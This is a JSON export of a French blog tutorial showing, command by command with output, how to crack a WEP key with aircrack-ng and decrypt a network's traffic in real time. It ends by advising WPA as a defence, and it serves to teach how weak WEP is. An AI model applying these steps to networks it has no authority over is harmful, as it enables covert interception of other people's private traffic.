{"id":271,"date":"2009-08-08T19:25:43","date_gmt":"2009-08-08T17:25:43","guid":{"rendered":"http:\/\/www.netexpertise.eu\/fr\/?p=271"},"modified":"2021-10-11T21:28:02","modified_gmt":"2021-10-11T20:28:02","slug":"cracker-cle-wep-et-decrypter-trafic-temps-reel","status":"publish","type":"post","link":"http:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html","title":{"rendered":"Comment Cracker une cl\u00e9 WEP et d\u00e9crypter le trafic en temps r\u00e9el"},"content":{"rendered":"\n<p>Cracker une cl\u00e9 WEP est extr\u00eamement facile et ne prend que quelques secondes. Vrai? Presque&#8230; et nous allons voir comment d\u00e9crypter le trafic en temps r\u00e9el sans m\u02c6me nous connecter au point d&rsquo;acc\u00e8s wifi.<br>&nbsp;<br>Toutes les manipulations se feront sous le super-utilisateur root puisqu&rsquo;il faut changer l&rsquo;\u00e9tat des interfaces.<br>&nbsp;<\/p>\n\n\n\n<h2>Installation de Aircrack-ng<\/h2>\n\n\n\n<p>T\u00e9l\u00e9charger et installer aircrack-ng. Il est disponible dans la plupart des distributions Linux sous forme de paquet.<br>Sur Debian, ex\u00e9cuter<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">apt-get install aircrack-ng<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>Aircrack inclut tous les outils n\u00e9cessaires pour capturer les paquets, cracker la cl\u00e9 WEP, et d\u00e9crypter le trafic en transit.<br>&nbsp;<br>Nous r\u00e9alisons les tests avec une carte PCMCIA wifi de chez Linksys. Un simple ifconfig permet d&rsquo;afficher la carte qui est donc bien d\u00e9tect\u00e9e.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ ifconfig\nlo        Interface doesn't support scanning.\n\nwlan0     Link encap:Ethernet  HWaddr 00:1a:70:6b:37:4e\n          UP BROADCAST MULTICAST  MTU:1500  Metric:1\n          RX packets:22 errors:0 dropped:0 overruns:0 frame:0\n          TX packets:63 errors:0 dropped:0 overruns:0 carrier:0\n          collisions:0 txqueuelen:1000\n          RX bytes:3742 (3.7 KB)  TX bytes:10773 (10.7 KB)<\/code><\/pre>\n\n\n\n<h2><br>Capture des paquets<\/h2>\n\n\n\n<p>Il faut tout d&rsquo;abord passer l&rsquo;interface en mode moniteur.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ airmon-ng\nInterface       Chipset         Driver\nwlan0           Broadcom 43xx   b43 - [phy0]<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>Airmon d\u00e9tecte bien l&rsquo;interface wifi.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ airmon-ng stop wlan0\nInterface       Chipset         Driver\nwlan0           Broadcom 43xx   b43 - [phy0]\n                                (monitor mode disabled)\n\nroot@crack_WEP:~$ airmon-ng start wlan0\nInterface       Chipset         Driver\nwlan0           Broadcom 43xx   b43 - [phy0]\n                                (monitor mode enabled on mon0)<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>En ex\u00e9cutant iwconfig, on constate que l&rsquo;interface mon0 a \u00e9t\u00e9 cr\u00e9\u00e9e en plus de l&rsquo;interface originale wlan0:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ iwconfig\nwlan0     IEEE 802.11bg  ESSID:\"\"\n          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated\n          Tx-Power=27 dBm\n          Retry min limit:7   RTS thr:off   Fragment thr=2352 B\n          Encryption key:off\n          Power Management:off\n          Link Quality:0  Signal level:0  Noise level:0\n          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0\n          Tx excessive retries:0  Invalid misc:0   Missed beacon:0\n\nmon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=27 dBm\n          Retry min limit:7   RTS thr:off   Fragment thr=2352 B\n          Encryption key:off\n          Power Management:off\n          Link Quality:0  Signal level:0  Noise level:0\n          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0\n          Tx excessive retries:0  Invalid misc:0   Missed beacon:0<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>Scannons les r\u00e9seaux \u00e0 proximit\u00e9<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ airodump-ng mon0\n CH 10 ][ Elapsed: 4 s ][ 2009-08-08 18:01\n BSSID              PWR  Beacons    #Data, #\/s  CH  MB  ENC  CIPHER AUTH ESSID\n 00:A0:C5:FF:84:72  197        4        0    0   1  11  WEP  WEP         private\n BSSID              STATION            PWR   Rate  Lost  Packets  Probes<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>Nous avons un point wifi \u00e9mettant sur le channel 1 avec encryption WEP et dont l&rsquo;adresse mac est 00:A0:C5:FF:84:72.<br>La cible d\u00e9finie, il suffit de capturer les paquets transitant dans les airs.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ airodump-ng --channel 1 --bssid 00:A0:C5:FF:84:72 --write temp wlan0\n\n CH  1 ][ Elapsed: 31 mins ][ 2009-05-02 21:52\n BSSID              PWR RXQ  Beacons    #Data, #\/s  CH  MB  ENC  CIPHER AUTH ESSID\n 00:A0:C5:FF:84:72  205  10     6058    24496    0   1  54  WEP  WEP         private\n BSSID              STATION            PWR   Rate  Lost  Packets  Probes\n 00:A0:C5:FF:84:72  00:18:4D:76:30:EB  188  54-54     0    24795<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>Les paquets seront captur\u00e9s dans des fichiers .cap ayant pour suffixe temp.<br>Les techniques de cassage devenant de plus en plus efficaces, il ne faut plus que 40000 paquets pour avoir de bonnes chances de casser la cl\u00e9 avec les algorithmes les plus r\u00e9cents. La capture est plus ou moins longue selon la quantit\u00e9 de trafic passant sur le lien.<br>&nbsp;<\/p>\n\n\n\n<h2>Cracker la cl\u00e9 WEP<\/h2>\n\n\n\n<p>Ne reste plus qu&rsquo;\u00e0 cracker la cl\u00e9 WEP:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ aircrack-ng -z -b 00:A0:C5:FF:84:72 temp.cap-0*.cap\n\n                                         Aircrack-ng 1.0 rc1\n\n                         [00:00:22] Tested 240228 keys (got 41742 IVs)\n\n   KB    depth   byte(vote)\n    0    0\/  1   B9(58880) A0(50688) 12(50176) F5(49920) 9E(48896) CD(48640)\n    1    0\/  1   19(54784) E8(52480) FA(52480) 4B(51456) 79(51456) DD(49664)\n    2    0\/  1   31(59648) EA(53504) 40(50688) 0A(50432) 88(50432) 0E(50176)\n    3    0\/  1   8C(60416) 05(49152) 56(49152) 23(48640) 52(48384) 03(48128)\n    4    0\/  1   B2(59136) AE(49664) 78(49152) FE(49152) 8B(48384) 9C(47616)\n    5    0\/  1   61(53504) E6(50688) FF(50176) 13(49664) 23(49408) C7(49408)\n    6    0\/  1   DD(56320) C4(51968) 90(50688) 0C(50176) CF(49920) CE(49152)\n    7    0\/  1   4E(53248) E6(51968) 7D(49152) 0B(48896) 90(48896) 06(48640)\n    8    0\/  1   FB(52224) C1(49664) E9(48128) 3D(47616) F0(47360) EB(47104)\n    9    0\/  1   0B(54784) BC(51712) 52(50432) 54(49920) F5(49920) CA(48896)\n   10    0\/  1   E6(50944) 1C(49920) 5F(49408) 1F(49152) 0A(48896) 83(48896)\n   11    2\/  1   FF(49664) 17(48384) 94(48128) 27(47872) 23(47616) B2(47616)\n   12    0\/  4   91(50452) A4(50360) 77(50156) 78(49540) FF(49476) 70(48788)\n\n             KEY FOUND! [ B9:19:31:8C:B2:61:DD:4E:FB:0B:AA:62:99 ]\n        Decrypted correctly: 100%<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>Eh oui, vous ne r\u00eavez pas, la cl\u00e9 a \u00e9t\u00e9 cass\u00e9e en 22 secondes!<br>&nbsp;<\/p>\n\n\n\n<h2>D\u00e9crypter le trafic<\/h2>\n\n\n\n<p>Il est possible d&rsquo;\u00e9couter le trafic en le capturant dans des fichiers .cap comme ci-dessus puis en le d\u00e9cryptant dans un second fichier avant de le passer en argument \u00e0 tcpdump par exemple:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ airdecap-ng -w b919318cb261dd4efb0baa6299 temp-01.cap\nTotal number of packets read         22072\nTotal number of WEP data packets      6245\nTotal number of WPA data packets         0\nNumber of plaintext data packets         3\nNumber of decrypted WEP  packets      6245\nNumber of corrupted WEP  packets         0\nNumber of decrypted WPA  packets         0\n\nroot@crack_WEP:~$ tcpdump -r temp-01-dec.cap -i wlan<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>Mais il est aussi possible de d\u00e9crypter le trafic en temps r\u00e9el et de le renvoyer vers une interface virtuelle at0 sur laquelle on peut \u00e9couter le plus normalement du monde avec tcpdump. La commande airtun-ng fournie avec le package Aircrack permet de r\u00e9aliser cette t\u00e2che.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ airtun-ng -a 00:A0:C5:FF:84:72 -w b919318cb261dd4efb0baa6299 mon0\ncreated tap interface at0\nWEP encryption specified. Sending and receiving frames through mon0.\nFromDS bit set in all frames.<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>Depuis un autre shell:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">crack_WEP:~$ tcpdump -i at0<\/code><\/pre>\n\n\n\n<h2><br>Conclusion<\/h2>\n\n\n\n<p>Il est tr\u00e8s facile de casser une cl\u00e9 WEP et d&rsquo;\u00e9couter le trafic qui y passe sans m\u00eame se connecter au point d&rsquo;acc\u00e8s, et donc sans se faire remarquer. Veillez \u00e0 n&rsquo;utiliser que des cl\u00e9s <a href=\"\/fr\/linux\/configurer-wpa-sur-linux-howto.html\">WPA<\/a> au minimum avec des passwords qui ne sont pas bas\u00e9s sur des mots du dictionnaire.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cracker une cl\u00e9 WEP est extr\u00eamement facile et ne prend que quelques secondes. Vrai? Presque&#8230; et nous allons voir comment d\u00e9crypter le trafic en temps r\u00e9el sans m\u02c6me nous connecter au point d&rsquo;acc\u00e8s wifi.&nbsp;Toutes les manipulations se feront sous le super-utilisateur root puisqu&rsquo;il faut changer l&rsquo;\u00e9tat des interfaces.&nbsp; Installation de Aircrack-ng T\u00e9l\u00e9charger et installer aircrack-ng. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[10,31],"tags":[465,407,106],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.13 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Netexpertise - Comment Cracker une cl\u00e9 WEP et d\u00e9crypter le trafic en temps r\u00e9el<\/title>\n<meta name=\"description\" content=\"Cracker une cl\u00e9 WEP est extr\u00eamement facile et ne prend que quelques secondes. Vrai? Presque... Voici comment proc\u00e9der\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Netexpertise - Comment Cracker une cl\u00e9 WEP et d\u00e9crypter le trafic en temps r\u00e9el\" \/>\n<meta property=\"og:description\" content=\"Cracker une cl\u00e9 WEP est extr\u00eamement facile et ne prend que quelques secondes. Vrai? Presque... Voici comment proc\u00e9der\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html\" \/>\n<meta property=\"og:site_name\" content=\"Netexpertise\" \/>\n<meta property=\"article:published_time\" content=\"2009-08-08T17:25:43+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-10-11T20:28:02+00:00\" \/>\n<meta name=\"author\" content=\"dave\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@netexpertise\" \/>\n<meta name=\"twitter:site\" content=\"@netexpertise\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html\",\"url\":\"https:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html\",\"name\":\"Netexpertise - Comment Cracker une cl\u00e9 WEP et d\u00e9crypter le trafic en temps r\u00e9el\",\"isPartOf\":{\"@id\":\"http:\/\/www.netexpertise.eu\/fr\/#website\"},\"datePublished\":\"2009-08-08T17:25:43+00:00\",\"dateModified\":\"2021-10-11T20:28:02+00:00\",\"author\":{\"@id\":\"http:\/\/www.netexpertise.eu\/fr\/#\/schema\/person\/e398f0307e2b167f6b884c4953be2632\"},\"description\":\"Cracker une cl\u00e9 WEP est extr\u00eamement facile et ne prend que quelques secondes. Vrai? Presque... Voici comment proc\u00e9der\",\"breadcrumb\":{\"@id\":\"https:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"http:\/\/www.netexpertise.eu\/fr\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Comment Cracker une cl\u00e9 WEP et d\u00e9crypter le trafic en temps r\u00e9el\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\/\/www.netexpertise.eu\/fr\/#website\",\"url\":\"http:\/\/www.netexpertise.eu\/fr\/\",\"name\":\"Netexpertise\",\"description\":\"Syst\u00e8mes \/ R\u00e9seaux \/ DevOps\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/www.netexpertise.eu\/fr\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Person\",\"@id\":\"http:\/\/www.netexpertise.eu\/fr\/#\/schema\/person\/e398f0307e2b167f6b884c4953be2632\",\"name\":\"dave\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"http:\/\/www.netexpertise.eu\/fr\/#\/schema\/person\/image\/\",\"url\":\"http:\/\/1.gravatar.com\/avatar\/1129916e1f4955bd632f27f836f64e55?s=96&d=mm&r=g\",\"contentUrl\":\"http:\/\/1.gravatar.com\/avatar\/1129916e1f4955bd632f27f836f64e55?s=96&d=mm&r=g\",\"caption\":\"dave\"},\"sameAs\":[\"http:\/\/www.netexpertise.eu\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Netexpertise - Comment Cracker une cl\u00e9 WEP et d\u00e9crypter le trafic en temps r\u00e9el","description":"Cracker une cl\u00e9 WEP est extr\u00eamement facile et ne prend que quelques secondes. Vrai? Presque... Voici comment proc\u00e9der","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html","og_locale":"fr_FR","og_type":"article","og_title":"Netexpertise - Comment Cracker une cl\u00e9 WEP et d\u00e9crypter le trafic en temps r\u00e9el","og_description":"Cracker une cl\u00e9 WEP est extr\u00eamement facile et ne prend que quelques secondes. Vrai? Presque... Voici comment proc\u00e9der","og_url":"https:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html","og_site_name":"Netexpertise","article_published_time":"2009-08-08T17:25:43+00:00","article_modified_time":"2021-10-11T20:28:02+00:00","author":"dave","twitter_card":"summary_large_image","twitter_creator":"@netexpertise","twitter_site":"@netexpertise","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html","url":"https:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html","name":"Netexpertise - Comment Cracker une cl\u00e9 WEP et d\u00e9crypter le trafic en temps r\u00e9el","isPartOf":{"@id":"http:\/\/www.netexpertise.eu\/fr\/#website"},"datePublished":"2009-08-08T17:25:43+00:00","dateModified":"2021-10-11T20:28:02+00:00","author":{"@id":"http:\/\/www.netexpertise.eu\/fr\/#\/schema\/person\/e398f0307e2b167f6b884c4953be2632"},"description":"Cracker une cl\u00e9 WEP est extr\u00eamement facile et ne prend que quelques secondes. Vrai? Presque... Voici comment proc\u00e9der","breadcrumb":{"@id":"https:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.netexpertise.eu\/fr\/systeme\/linux\/cracker-cle-wep-et-decrypter-trafic-temps-reel.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"http:\/\/www.netexpertise.eu\/fr"},{"@type":"ListItem","position":2,"name":"Comment Cracker une cl\u00e9 WEP et d\u00e9crypter le trafic en temps r\u00e9el"}]},{"@type":"WebSite","@id":"http:\/\/www.netexpertise.eu\/fr\/#website","url":"http:\/\/www.netexpertise.eu\/fr\/","name":"Netexpertise","description":"Syst\u00e8mes \/ R\u00e9seaux \/ DevOps","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.netexpertise.eu\/fr\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"http:\/\/www.netexpertise.eu\/fr\/#\/schema\/person\/e398f0307e2b167f6b884c4953be2632","name":"dave","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"http:\/\/www.netexpertise.eu\/fr\/#\/schema\/person\/image\/","url":"http:\/\/1.gravatar.com\/avatar\/1129916e1f4955bd632f27f836f64e55?s=96&d=mm&r=g","contentUrl":"http:\/\/1.gravatar.com\/avatar\/1129916e1f4955bd632f27f836f64e55?s=96&d=mm&r=g","caption":"dave"},"sameAs":["http:\/\/www.netexpertise.eu"]}]}},"_links":{"self":[{"href":"http:\/\/www.netexpertise.eu\/fr\/wp-json\/wp\/v2\/posts\/271"}],"collection":[{"href":"http:\/\/www.netexpertise.eu\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.netexpertise.eu\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.netexpertise.eu\/fr\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/www.netexpertise.eu\/fr\/wp-json\/wp\/v2\/comments?post=271"}],"version-history":[{"count":0,"href":"http:\/\/www.netexpertise.eu\/fr\/wp-json\/wp\/v2\/posts\/271\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.netexpertise.eu\/fr\/wp-json\/wp\/v2\/media?parent=271"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.netexpertise.eu\/fr\/wp-json\/wp\/v2\/categories?post=271"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.netexpertise.eu\/fr\/wp-json\/wp\/v2\/tags?post=271"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}